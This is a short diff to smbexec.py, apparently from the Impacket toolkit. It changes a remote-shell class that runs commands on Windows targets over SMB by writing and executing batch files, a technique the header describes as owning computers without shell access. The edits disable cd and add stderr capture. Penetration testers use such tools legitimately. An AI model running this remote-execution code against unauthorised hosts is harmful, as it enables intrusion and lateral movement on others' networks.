@@ -5,7 +5,7 @@
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# $Id: smbexec.py 903 2013-11-07 21:10:06Z bethus@gmail.com $
+# $Id: smbexec.py 1226 2014-06-02 17:13:48Z bethus@gmail.com $
 #
 # A similar approach to psexec w/o using RemComSvc. The technique is described here
 # http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access
@@ -228,7 +228,11 @@ class RemoteShell(cmd.Cmd):
         return False
 
     def do_cd(self, s):
-        self.execute_remote('cd ' + s)
+        # We just can't CD or mantain track of the target dir.
+        if len(s) > 0:
+            print "[!] You can't CD under SMBEXEC. Use full paths."
+
+        self.execute_remote('cd ' )
         if len(self.__outputBuffer) > 0:
             # Stripping CR/LF
             self.prompt = string.replace(self.__outputBuffer,'\r\n','') + '>'
@@ -255,7 +259,7 @@ class RemoteShell(cmd.Cmd):
             os.unlink(SMBSERVER_DIR + '/' + OUTPUT_FILENAME)
 
     def execute_remote(self, data):
-        command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile 
+        command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile 
         if self.__mode == 'SERVER':
             command += ' & ' + self.__copyBack
         command += ' & ' + 'del ' + self.__batchFile 
